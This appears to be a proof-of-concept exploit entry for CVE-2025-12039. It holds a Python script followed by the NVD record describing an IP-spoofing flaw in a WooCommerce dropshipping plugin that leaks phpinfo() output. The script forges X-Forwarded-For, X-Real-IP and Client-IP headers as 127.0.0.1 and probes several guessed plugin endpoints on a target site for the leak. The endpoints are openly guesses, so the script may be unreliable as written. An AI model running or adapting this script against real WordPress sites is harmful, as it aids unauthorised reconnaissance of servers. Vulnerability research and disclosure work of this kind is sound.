CVE-2025-12039

import requests # CVE-2025-12039 PoC - IP Address Spoofing to retrieve phpinfo() # Target: BigBuy Dropshipping Connector for WooCommerce plugin (<= 2.0.5) target_url = "http://target-wordpress-site.com/" # Craft headers with spoofed IP addresses headers = { 'X-Forwarded-For': '127.0.0.1', # Spoofed IP 'X-Real-IP': '127.0.0.1', # Alternative header 'Client-IP': '127.0.0.1', # Another IP header 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Try to access the vulnerable API endpoint # The exact endpoint may vary, common patterns: endpoints = [ 'wp-json/bigbuy/v1/api', '?rest_route=/bigbuy/v1/api', 'wp-admin/admin-ajax.php?action=bigbuy_api' ] for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, headers=headers, timeout=10) # Check if response contains phpinfo() output if 'phpinfo()' in response.text or '<h1>phpinfo()</h1>' in response.text: print(f"[+] VULNERABLE! phpinfo() leak found at: {url}") print("[+] Server information exposed!") break elif response.status_code == 200: print(f"[*] Endpoint exists: {url} (status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("\n[!] Note: This PoC demonstrates IP spoofing capability.") print("[!] The actual exploitation depends on specific plugin configuration.")

{"cve": {"id": "CVE-2025-12039", "sourceIdentifier": "[email protected]", "published": "2025-11-21T09:15:46.367", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BigBuy Dropshipping Connector for WooCommerce plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 2.0.5 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to retrieve the output of phpinfo()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L225", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/bigbuy-wc-dropshipping-connector/tags/2.0.5/src/Controller/ApiController.php#L260", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/19a3d5a5-4673-41e7-9868-99699852f330?source=cve", "source": "[email protected]"}]}}